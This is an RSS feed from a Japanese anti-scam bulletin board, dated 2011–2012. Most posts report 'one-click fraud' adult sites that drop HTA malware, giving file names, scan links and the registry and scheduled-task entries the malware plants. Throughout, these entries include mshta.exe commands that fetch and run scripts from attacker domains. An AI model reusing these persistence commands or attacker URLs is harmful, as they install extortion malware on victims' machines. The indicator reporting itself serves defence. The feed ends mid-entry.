<?xml version="1.0" encoding="Shift_JIS" ?>
<rdf:RDF
  xmlns="http://purl.org/rss/1.0/"
  xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
  xmlns:dc="http://purl.org/dc/elements/1.1/"
  xml:lang="ja">
 <channel rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yyrss.cgi">
  <title>ワンクリ詐欺掲示板</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>RSS for ワンクリ詐欺掲示板</description>
  <items>
   <rdf:Seq>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
   </rdf:Seq>
  </items>
 </channel>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title> EROSTAR </title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://qn515q.info/" target="_blank">http://qn515q.info/</a>    File name 「 MovieID_diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2.hta」  <a href="https://www.virustotal.com/file/544a64fe6cec8c723b3c48090b97a156e9f161f1a01b68bd380a315055d4cb8f/analysis/1327915764/" target="_blank">https://www.virustotal.com/file/544a64fe6cec8c723b3c48090b97a156e9f161f1a01b68bd380a315055d4cb8f/analysis/1327915764/</a>  C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [SystemBootdiHvYDyYQRvrDubXyHsSW4gHdc0xQYi2] C:\Users\Cerberus\UserProfile\SystemFile.lnk O4 - HKCU\..\Run: [RegWritediHvYDyYQRvrDubXyHsSW4gHdc0xQYi2] C:\Users\Cerberus\SoftRecovery\datdiHvYDyYQRvrDubXyHsSW4gHdc0xQYi2.bat O4 - Startup: RegWriting.lnk = C:\Windows\System32\mshta.exe  The link place of &quot;RegWriting&quot;   C:\Windows\System32\mshta.exe <a href="http://qn515q.info/set_inf2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2" target="_blank">http://qn515q.info/set_inf2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2</a>  The link place of &quot;SystemFile&quot; C:\Users\Cerberus\UserProfile\mshost.exe <a href="http://qn515q.info/reg2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2&amp;log=1" target="_blank">http://qn515q.info/reg2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2&amp;log=1</a>   Startup on Registory HKCU:Run RegWritediHvYDyYQRvrDubXyHsSW4gHdc0xQYi2 C:\Users\Cerberus\SoftRecovery\datdiHvYDyYQRvrDubXyHsSW4gHdc0xQYi2.bat SystemBootdiHvYDyYQRvrDubXyHsSW4gHdc0xQYi2 C:\Users\Cerberus\UserProfile\SystemFile.lnk Startup User RegWriting.lnk C:\Windows\System32\mshta.exe  Task Scheduler librar」 RegWriting &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://qn515q.info/set_inf2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2&lt;/Arguments&gt;" target="_blank">http://qn515q.info/set_inf2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2&lt;/Arguments&gt;</a>    SystemFile &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://qn515q.info/reg2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2&lt;/Arguments&gt;" target="_blank">http://qn515q.info/reg2.php?cccid=diHvYDyYQRvrDubXyHsSW4gHdc0xQYi2&lt;/Arguments&gt;</a>   ----------------------------------------------------------  <a href="http://rrinl58r.info/" target="_blank">http://rrinl58r.info/</a>   File name 「MovieID_6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo.hta」  <a href="https://www.virustotal.com/file/abea9c586fc93148dc75b5fdffadfca55e0b18d11615a72b1e926dc54f3b4a2f/analysis/1328011779/" target="_blank">https://www.virustotal.com/file/abea9c586fc93148dc75b5fdffadfca55e0b18d11615a72b1e926dc54f3b4a2f/analysis/1328011779/</a>  C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [SystemBoot6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo] C:\Users\Cerberus\UserProfile\SystemFile.lnk O4 - HKCU\..\Run: [RegWrite6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo] C:\Users\Cerberus\SoftRecovery\dat6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo.bat O4 - Startup: RegWriting.lnk = C:\Windows\System32\mshta.exe   The link place of &quot;RegWriting&quot;   C:\Windows\System32\mshta.exe <a href="http://erostar.info/set_inf2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo" target="_blank">http://erostar.info/set_inf2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo</a>    The link place of &quot;SystemFile&quot;   C:\Users\Cerberus\UserProfile\mshost.exe <a href="http://erostar.info/reg2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo&amp;log=1" target="_blank">http://erostar.info/reg2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo&amp;log=1</a>   Startup on Registory HKCU:Run RegWrite6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo C:\Users\Cerberus\SoftRecovery\dat6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo.bat HKCU:Run SystemBoot6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo C:\Users\Cerberus\UserProfile\SystemFile.lnk  Startup User RegWriting.lnk C:\Windows\System32\mshta.exe    Task Scheduler library　  RegWriting &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://erostar.info/set_inf2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo&lt;/Arguments&gt;" target="_blank">http://erostar.info/set_inf2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo&lt;/Arguments&gt;</a>     SystemFile  &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://erostar.info/reg2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo&lt;/Arguments&gt;" target="_blank">http://erostar.info/reg2.php?cccid=6y3w2pAsn9hdWZxTZrAP8bFXdTOPBVPo&lt;/Arguments&gt;</a>            </description>
  <dc:date>2012-01-30T21:58+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>Japanese Movies</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://bzin85b.info/" target="_blank">http://bzin85b.info/</a>  File name 「MovieID_JQwv8ppT2HNiZiFZQb8oWOMyHG6wrjfk.hta」 <a href="https://www.virustotal.com/file/f5518919afe6d8743a12667b9e3e79d464f301f464e2f0a8cad18e257e327f94/analysis/1327219800/" target="_blank">https://www.virustotal.com/file/f5518919afe6d8743a12667b9e3e79d464f301f464e2f0a8cad18e257e327f94/analysis/1327219800/</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC] C:\Users\Cerberus\SoftRecovery\datSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC.bat O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe  The link place of &quot;RegWrite&quot;   C:\Windows\System32\mshta.exe <a href="http://bzin85b.info/set_inf2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC" target="_blank">http://bzin85b.info/set_inf2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC</a>   The link place of &quot;SystemBoot&quot;  C:\Users\Cerberus\UserProfile\mshost.exe <a href="http://bzin85b.info/reg2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC&amp;log=1" target="_blank">http://bzin85b.info/reg2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC&amp;log=1</a>   Startup on Registory  HKCU:Run RegWriteSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC C:\Users\Cerberus\SoftRecovery\datSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC.bat HKCU:Run SystemBootSfoEqUqkOVTh3AUJGGas9sYTin7NN6vC C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe  Task Scheduler library RegWrite  &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://bzin85b.info/set_inf2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC&lt;/Arguments&gt;" target="_blank">http://bzin85b.info/set_inf2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC&lt;/Arguments&gt;</a>  Task Scheduler library SystemBoot  &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://bzin85b.info/reg2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC&lt;/Arguments&gt;" target="_blank">http://bzin85b.info/reg2.php?cccid=SfoEqUqkOVTh3AUJGGas9sYTin7NN6vC&lt;/Arguments&gt;</a>   ----------------------------------------------------------  <a href="http://ink59di.info/" target="_blank">http://ink59di.info/</a>  File name 「MovieID_kNZwPodBZ1pFSGnptoiDF7qMVj2DMUpz.hta」  <a href="https://www.virustotal.com/file/daafa3bc00d1e1b2f4d7f2a0fe659ac1aca4d45f087a36f0e230fcb82ce711b2/analysis/1327320142/" target="_blank">https://www.virustotal.com/file/daafa3bc00d1e1b2f4d7f2a0fe659ac1aca4d45f087a36f0e230fcb82ce711b2/analysis/1327320142/</a>  C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [SystemBootzeb7zjtYnCMSZEU2mfdWr2513angqCQW] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWritezeb7zjtYnCMSZEU2mfdWr2513angqCQW] C:\Users\Cerberus\SoftRecovery\datzeb7zjtYnCMSZEU2mfdWr2513angqCQW.bat O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe   The link place of &quot;RegWrite&quot;   C:\Windows\System32\mshta.exe <a href="http://ink59di.info/set_inf2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW" target="_blank">http://ink59di.info/set_inf2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW</a>  The link place of &quot;SystemBoot&quot;   C:\Users\Cerberus\UserProfile\mshost.exe <a href="http://ink59di.info/reg2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW&amp;log=1" target="_blank">http://ink59di.info/reg2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW&amp;log=1</a>   Startup on Registory   HKCU:Run RegWritezeb7zjtYnCMSZEU2mfdWr2513angqCQW C:\Users\Cerberus\SoftRecovery\datzeb7zjtYnCMSZEU2mfdWr2513angqCQW.bat HKCU:Run SystemBootzeb7zjtYnCMSZEU2mfdWr2513angqCQW C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe   Task Scheduler library RegWrite  &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://ink59di.info/set_inf2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW&lt;/Arguments&gt;" target="_blank">http://ink59di.info/set_inf2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW&lt;/Arguments&gt;</a>   SystemBoot  &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;  &lt;Arguments&gt;<a href="http://ink59di.info/reg2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW&lt;/Arguments&gt;" target="_blank">http://ink59di.info/reg2.php?cccid=zeb7zjtYnCMSZEU2mfdWr2513angqCQW&lt;/Arguments&gt;</a>                    </description>
  <dc:date>2012-01-22T20:49+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>セックス動画EROS </title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://ero-xx.com/" target="_blank">http://ero-xx.com/</a> File name 「movie_load1326801154.hta」  <a href="http://r.virscan.org/report/305a26e3e9b7e959049df99042d7e8b5.html" target="_blank">http://r.virscan.org/report/305a26e3e9b7e959049df99042d7e8b5.html</a>   C:\Users\Cerberus\AppData\Roaming\Media Center Programs\wmMsgSvr.exe  C:\WINDOWS\system32\mshta.exe  O4 - HKCU\..\Run: [WqbLogic radiuy] &quot;C:\Users\Cerberus\AppData\Roaming\Adobe\radiuy.lnk&quot; O4 - HKCU\..\Run: [granite] C:\WINDOWS\system32\mshta.exe &quot;C:\Documents and Settings\Cerberus\Application Data\granite\granite.hta&quot;    The link place of &quot;radiuy&quot;  &quot;C:\Users\Cerberus\AppData\Roaming\Media Center Programs\wmMsgSvr.exe&quot; //B //E:VBScript.Encode &quot;C:\Users\Cerberus\AppData\Roaming\Adobe\ChalcedonyeKsD&quot;   Startup on Registory   HKCU:Run granite C:\WINDOWS\system32\mshta.exe &quot;C:\Documents and Settings\Cerberus\Application Data\granite\granite.hta&quot; HKCU:Run WqbLogic radiuy &quot;C:\Users\Cerberus\AppData\Roaming\Adobe\radiuy.lnk&quot;   </description>
  <dc:date>2012-01-17T21:50+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>WMV</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://virtuoso.nebulanikki.net/" target="_blank">http://virtuoso.nebulanikki.net/</a> <a href="http://nebulanikki.net/" target="_blank">http://nebulanikki.net/</a> <a href="http://" target="_blank">http://</a>*.nebulanikki.net/  File name 「candygirl_1325973169.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=5f7846dad30c10f9a9ee8b555307aa48ac999152468bf6c562d575a8dd6c2a49-1325972821" target="_blank">http://www.virustotal.com/file-scan/report.html?id=5f7846dad30c10f9a9ee8b555307aa48ac999152468bf6c562d575a8dd6c2a49-1325972821</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [breakslow_0fb017474f2556001a32d9cc851a6225332683e8a3b68a2d] C:\Users\Cerberus\AppData\Roaming\Adobe\breakslow_0fb017474f2556001a32d9cc851a6225332683e8a3b68a2d.vbs  Startup on Registory HKCU:Run breakslow_0fb017474f2556001a32d9cc851a6225332683e8a3b68a2d C:\Users\Cerberus\AppData\Roaming\Adobe\breakslow_0fb017474f2556001a32d9cc851a6225332683e8a3b68a2d.vbs  Task Scheduler library &lt;Command&gt;C:\Users\Cerberus\AppData\Roaming\Adobe\breakslow_0fb017474f2556001a32d9cc851a6225332683e8a3b68a2d.vbs&lt;/Command&gt;  ---------------------------------------------------------  <a href="http://upheld.yorkshirejulie.net/" target="_blank">http://upheld.yorkshirejulie.net/</a> <a href="http://yorkshirejulie.net/" target="_blank">http://yorkshirejulie.net/</a> <a href="http://" target="_blank">http://</a>*.yorkshirejulie.net/   File name 「smsister_1326370947.hta」  <a href="http://www.virustotal.com/file-scan/report.html?id=f4b1b53ed6c07a337d65d1c9abde3b967bd5c34274a75ef95637d8567c79616c-1326370534" target="_blank">http://www.virustotal.com/file-scan/report.html?id=f4b1b53ed6c07a337d65d1c9abde3b967bd5c34274a75ef95637d8567c79616c-1326370534</a>    C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [odiniris_29cc8b8d862983b030083d1d3c2ec051b46cc660cb4321a2] C:\Users\Cerberus\AppData\Roaming\Identities\odiniris_29cc8b8d862983b030083d1d3c2ec051b46cc660cb4321a2.vbs   Startup on Registory   HKCU:Run odiniris_29cc8b8d862983b030083d1d3c2ec051b46cc660cb4321a2 C:\Users\Cerberus\AppData\Roaming\Identities\odiniris_29cc8b8d862983b030083d1d3c2ec051b46cc660cb4321a2.vbs   Task Scheduler library　  &lt;Command&gt;C:\Users\Cerberus\AppData\Roaming\Identities\odiniris_29cc8b8d862983b030083d1d3c2ec051b46cc660cb4321a2.vbs&lt;/Command&gt;        </description>
  <dc:date>2012-01-08T19:46+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>JPPorn</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://av-porn.info/" target="_blank">http://av-porn.info/</a>  File name 「MovieID_KpUzK5fptCxTWTYXRidhYP5nhatuiC8N.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=f5b31335fefa7d46bab89c6985d7c097eaf8a6b29ac990b5bf63c75e0499a3b6-1325411290" target="_blank">http://www.virustotal.com/file-scan/report.html?id=f5b31335fefa7d46bab89c6985d7c097eaf8a6b29ac990b5bf63c75e0499a3b6-1325411290</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootKpUzK5fptCxTWTYXRidhYP5nhatuiC8N] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteKpUzK5fptCxTWTYXRidhYP5nhatuiC8N] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe  The link place of &quot;RegWrite&quot;  C:\Windows\System32\mshta.exe <a href="http://av-porn.info/set_inf2.php?cccid=KpUzK5fptCxTWTYXRidhYP5nhatuiC8N" target="_blank">http://av-porn.info/set_inf2.php?cccid=KpUzK5fptCxTWTYXRidhYP5nhatuiC8N</a>   The link place of &quot;SystemBoot&quot;  C:\Users\Cerberus\UserProfile\htmlapp.exe <a href="http://av-porn.info/reg2.php?cccid=KpUzK5fptCxTWTYXRidhYP5nhatuiC8N" target="_blank">http://av-porn.info/reg2.php?cccid=KpUzK5fptCxTWTYXRidhYP5nhatuiC8N</a>   Startup on Registory  HKCU:Run RegWriteKpUzK5fptCxTWTYXRidhYP5nhatuiC8N C:\Users\Cerberus\SoftRecovery\RegWrite.lnk HKCU:Run SystemBootKpUzK5fptCxTWTYXRidhYP5nhatuiC8N C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe  Task Scheduler library &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://av-porn.info/set_inf2.php?cccid=KpUzK5fptCxTWTYXRidhYP5nhatuiC8N&lt;/Arguments&gt;" target="_blank">http://av-porn.info/set_inf2.php?cccid=KpUzK5fptCxTWTYXRidhYP5nhatuiC8N&lt;/Arguments&gt;</a>   --------------------------------------------------------  <a href="http://olive-porn.info/" target="_blank">http://olive-porn.info/</a>  File name 「MovieID_WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=2e9fddcae84fcb8670fc832ff939495c91ceb63b5c20de445439b8ff905af494-1325763145" target="_blank">http://www.virustotal.com/file-scan/report.html?id=2e9fddcae84fcb8670fc832ff939495c91ceb63b5c20de445439b8ff905af494-1325763145</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootWgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteWgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk O4 - Startup: RegWrite.lnk = C:\Windows\System32\mshta.exe  The link place of &quot;RegWrite&quot;  C:\Windows\System32\mshta.exe <a href="http://olive-porn.info/set_inf2.php?cccid=WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c" target="_blank">http://olive-porn.info/set_inf2.php?cccid=WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c</a>  The link place of &quot;SystemBoot&quot;  C:\Users\Cerberus\UserProfile\htmlapp.exe <a href="http://olive-porn.info/reg2.php?cccid=WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c" target="_blank">http://olive-porn.info/reg2.php?cccid=WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c</a>  Startup on Registory  HKCU:Run RegWriteWgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c C:\Users\Cerberus\SoftRecovery\RegWrite.lnk HKCU:Run SystemBootWgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c C:\Users\Cerberus\UserProfile\SystemBoot.lnk Startup User RegWrite.lnk C:\Windows\System32\mshta.exe  Task Scheduler library　 &lt;Command&gt;C:\Windows\system32\mshta.exe&lt;/Command&gt;    &lt;Arguments&gt;<a href="http://olive-porn.info/set_inf2.php?cccid=WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c&lt;/Arguments&gt;" target="_blank">http://olive-porn.info/set_inf2.php?cccid=WgWKURT2JdtOC6amvoWI0Z1hxTAQAI0c&lt;/Arguments&gt;</a>       </description>
  <dc:date>2012-01-01T23:01+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>エッチ動画</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://cynical.boronplanet.net/" target="_blank">http://cynical.boronplanet.net/</a> <a href="http://boronplanet.net/" target="_blank">http://boronplanet.net/</a> <a href="http://" target="_blank">http://</a>*.boronplanet.net/  File name 「ahegaow_1324888643.hta」 <a href="http://www.virustotal.com/file-scan/report.html?id=0aa8310d4dc613a2d722696d3216a91924386820344bcfacfa62ae02bf9e71db-1324888294" target="_blank">http://www.virustotal.com/file-scan/report.html?id=0aa8310d4dc613a2d722696d3216a91924386820344bcfacfa62ae02bf9e71db-1324888294</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [peacev_d0260443d08be7dde70485bc1712a14f14e8eeabc8c21603] C:\Users\Cerberus\AppData\Roaming\Macromedia\peacev_d0260443d08be7dde70485bc1712a14f14e8eeabc8c21603.vbs  Startup on Registor  HKCU:Run peacev_d0260443d08be7dde70485bc1712a14f14e8eeabc8c21603 C:\Users\Cerberus\AppData\Roaming\Macromedia\peacev_d0260443d08be7dde70485bc1712a14f14e8eeabc8c21603.vbs  Task Scheduler library &lt;Command&gt;C:\Users\Cerberus\AppData\Roaming\Macromedia\peacev_d0260443d08be7dde70485bc1712a14f14e8eeabc8c21603.vbs&lt;/Command&gt;   </description>
  <dc:date>2011-12-26T18:25+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>アダルト見放題</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://comet.greatbearlily.net/" target="_blank">http://comet.greatbearlily.net/</a> <a href="http://greatbearlily.net/" target="_blank">http://greatbearlily.net/</a> <a href="http://" target="_blank">http://</a>*.greatbearlily.net/  File name 「erobody_1324639546.hta」 <a href="http://r.virscan.org/8344324a1eda8b3da95ee3ce50704a8b" target="_blank">http://r.virscan.org/8344324a1eda8b3da95ee3ce50704a8b</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [onanycrazy_b770db4a5b9f696956cb90f1c46e1dd7fcc466ab08e7e4b4] C:\Users\Cerberus\AppData\Roaming\Media Center Programs\onanycrazy_b770db4a5b9f696956cb90f1c46e1dd7fcc466ab08e7e4b4.vbs  Startup on Registory  KCU:Run onanycrazy_b770db4a5b9f696956cb90f1c46e1dd7fcc466ab08e7e4b4 C:\Users\Cerberus\AppData\Roaming\Media Center Programs\onanycrazy_b770db4a5b9f696956cb90f1c46e1dd7fcc466ab08e7e4b4.vbs  Task Scheduler library &lt;Command&gt;C:\Users\Cerberus\AppData\Roaming\Media&lt;/Command&gt;    &lt;Arguments&gt;Center Programs\onanycrazy_b770db4a5b9f696956cb90f1c46e1dd7fcc466ab08e7e4b4.vbs&lt;/Arguments&gt;     </description>
  <dc:date>2011-12-23T22:14+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>教えてください</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description><a href="http://" target="_blank">http://</a>　www.pomdora.com/ 上記サイトの情報が無いので質問させてください 支払期限カウントダウンの消えないポップアップが出ました （それに関しては削除ツールを使用して消しました）  ワンクリ詐欺サイトなんでしょうか 動画は4秒で終了でしたが出ました 興味本位で知らないサイトを使うもんじゃないと後悔しました  このまま無視を決め込んで大丈夫なサイトなのかどうか教えていただければ有難いです</description>
  <dc:date>2011-12-22T11:56+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>JPPorn</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://girls-porn.info/" target="_blank">http://girls-porn.info/</a>  File name 「MovieID_ROGy6Ar6HagJIlnctGgiILtdhWtP5gkf.hta」  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBootROGy6Ar6HagJIlnctGgiILtdhWtP5gkf] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWriteROGy6Ar6HagJIlnctGgiILtdhWtP5gkf] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk  The link place of &quot;RegWrite&quot;  C:\Windows\System32\mshta.exe <a href="http://girls-porn.info/set_inf2.php?cccid=ROGy6Ar6HagJIlnctGgiILtdhWtP5gkf" target="_blank">http://girls-porn.info/set_inf2.php?cccid=ROGy6Ar6HagJIlnctGgiILtdhWtP5gkf</a>  The link place of &quot;SystemBoot&quot; C:\Users\Cerberus\UserProfile\htmlapp.exe <a href="http://girls-porn.info/reg2.php?cccid=ROGy6Ar6HagJIlnctGgiILtdhWtP5gkf" target="_blank">http://girls-porn.info/reg2.php?cccid=ROGy6Ar6HagJIlnctGgiILtdhWtP5gkf</a>   Startup on Registory  HKCU:Run SystemBootROGy6Ar6HagJIlnctGgiILtdhWtP5gkf C:\Users\Cerberus\UserProfile\SystemBoot.lnk HKCU:Run RegWriteROGy6Ar6HagJIlnctGgiILtdhWtP5gkf C:\Users\Cerberus\SoftRecovery\RegWrite.lnk  -----------------------------------------------------  <a href="http://erotic-porn.info/" target="_blank">http://erotic-porn.info/</a>  File name 「MovieID_74jSZnuHQOtwIiKvQ4K2LtPOKy5imVvh.hta」  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [SystemBoot74jSZnuHQOtwIiKvQ4K2LtPOKy5imVvh] C:\Users\Cerberus\UserProfile\SystemBoot.lnk O4 - HKCU\..\Run: [RegWrite74jSZnuHQOtwIiKvQ4K2LtPOKy5imVvh] C:\Users\Cerberus\SoftRecovery\RegWrite.lnk  The link place of &quot;RegWrite&quot;  C:\Windows\System32\mshta.exe <a href="http://erotic-porn.info/set_inf2.php?cccid=74jSZnuHQOtwIiKvQ4K2LtPOKy5imVvh" target="_blank">http://erotic-porn.info/set_inf2.php?cccid=74jSZnuHQOtwIiKvQ4K2LtPOKy5imVvh</a>  The link place of &quot;SystemBoot&quot; C:\Users\Cerberus\UserProfile\htmlapp.exe <a href="http://erotic-porn.info/reg2.php?cccid=74jSZnuHQOtwIiKvQ4K2LtPOKy5imVvh" 